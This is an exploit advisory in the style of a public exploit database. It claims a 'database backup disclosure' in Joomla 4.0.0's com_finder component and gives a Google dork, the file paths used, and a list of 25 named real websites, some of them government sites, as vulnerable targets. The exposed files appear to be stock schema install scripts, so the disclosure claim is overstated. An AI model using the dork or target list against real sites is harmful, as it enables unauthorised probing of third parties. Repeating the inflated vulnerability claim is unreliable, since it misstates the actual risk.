################################################################################################# # Exploit Title : Joomla Com_Finder Components 4.0.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Vendor Homepage : joomla.org # Software Download Links : github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql github.com/joomla/joomla-cms/archive/4.0.0-alpha1.zip # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Version Information : 4.0 # Google Dorks : inurl:''/administrator/components/com_finder/'' # CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110189 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2259 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31521 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /administrator # Exploit : /administrator/components/com_finder/sql/install.mysql.sql /administrator/components/com_finder/sql/install.postgresql.sql /administrator/components/com_finder/sql/uninstall.mysql.sql /administrator/components/com_finder/sql/uninstall.postgresql.sql ################################################################################################# # Example Vulnerable Sites => [+] library.franklincountyva.gov/administrator/components/com_finder/sql/install.mysql.sql [+] freightdb.kzntransport.gov.za/administrator/components/com_finder/sql/install.mysql.sql [+] operaciavianocnedieta.sk/administrator/components/com_finder/sql/install.mysql.sql [+] mvapower.com/MVASITE/administrator/components/com_finder/sql/install.mysql.sql [+] kkn.cz/gdpr/administrator/components/com_finder/sql/install.mysql.sql [+] labarjaque.com/administrator/components/com_finder/sql/install.mysql.sql [+] elmwoodnebraska.com/nl/administrator/components/com_finder/sql/install.mysql.sql [+] comesa.int/2016/administrator/components/com_finder/sql/install.mysql.sql [+] xpilot-ai.org/administrator/components/com_finder/sql/install.mysql.sql [+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] njebertappraisals.com/administrator/components/com_finder/sql/install.mysql.sql [+] villaalena.cz/administrator/components/com_finder/sql/install.mysql.sql [+] cosemsmg.org.br/site/administrator/components/com_finder/sql/install.mysql.sql [+] isleofwightdiscos.co.uk/administrator/components/com_finder/sql/install.mysql.sql [+] tgr.org.hk/administrator/components/com_finder/sql/install.mysql.sql [+] recursosvirtualesperu.com/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] asbsteel.com/site/administrator/components/com_finder/sql/install.mysql.sql [+] brisbug.asn.au/administrator/components/com_finder/sql/install.mysql.sql [+] djabugay.org.au/Joomla/administrator/components/com_finder/sql/install.mysql.sql [+] stoneandequipment.com/panama/administrator/components/com_finder/sql/install.mysql.sql [+] vente-ordi.com/administrator/components/com_finder/sql/install.mysql.sql [+] huili.fi/administrator/components/com_finder/sql/install.mysql.sql [+] jbyouth.net/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] bristolacneremoval.co.uk/administrator/components/com_finder/sql/install.mysql.sql [+] utilsoluciones.com/en/administrator/components/com_finder/sql/install.mysql.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################